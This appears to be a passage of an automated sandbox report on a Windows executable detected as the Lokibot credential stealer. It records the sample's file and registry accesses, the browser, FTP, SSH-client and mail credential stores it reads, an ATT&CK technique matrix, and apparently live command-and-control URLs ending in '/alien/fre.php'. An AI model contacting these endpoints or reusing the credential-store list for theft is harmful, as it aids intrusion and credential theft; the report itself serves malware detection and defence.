                    C:\Windows\Fonts\BROADW.TTF
                    C:\Windows\Fonts\BRUSHSCI.TTF
                    C:\Windows\Fonts\CALIFR.TTF
                    C:\Windows\Fonts\CALIFI.TTF
                    C:\Windows\Fonts\CALIFB.TTF
                    C:\Windows\Fonts\CENTAUR.TTF
                    C:\Windows\Fonts\CHILLER.TTF
                    C:\Windows\Fonts\COLONNA.TTF
                    C:\Windows\Fonts\COOPBL.TTF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: 5_2_00406069 GetUserNameW, 5_2_00406069
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match; File source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
Source: Yara match; File source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE

Yara detected Lokibot
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: PopPassword 5_2_0040D069
Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe; Code function: SmtpPassword 5_2_0040D069
Source: Yara match; File source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Valid Accounts | Windows Management Instrumentation | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 111 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Virtualization/Sandbox Evasion 2 | Credentials in Registry 2 | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 112 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 41 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 12 | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                  Behavior Graph

                  Screenshots

                  Thumbnails


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

Source | Detection | Scanner | Label
Conan Fegan - Aluminium.exe | 100% | Avira | HEUR/AGEN.1138558
Conan Fegan - Aluminium.exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

Source | Detection | Scanner | Label
0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack | 100% | Avira | HEUR/AGEN.1138558
5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack | 100% | Avira | HEUR/AGEN.1138558
0.2.Conan Fegan - Aluminium.exe.960000.0.unpack | 100% | Avira | HEUR/AGEN.1138558
0.0.Conan Fegan - Aluminium.exe.960000.0.unpack | 100% | Avira | HEUR/AGEN.1138558
5.2.Conan Fegan - Aluminium.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                  Domains

                  No Antivirus matches

                  URLs

Source | Detection | Scanner | Label
http://www.fontbureau.comionF | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/; | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnO | 0% | Avira URL Cloud | safe
http://kbfvzoboss.bid/alien/fre.php | 0% | Avira URL Cloud | safe
http://www.fonts.comc | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.ritcophysiotherapy.com.au/wap121/five/fre.php | 0% | Avira URL Cloud | safe
http://alphastand.top/alien/fre.php | 0% | Avira URL Cloud | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm- | 0% | Avira URL Cloud | safe
http://alphastand.win/alien/fre.php | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | Avira URL Cloud | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
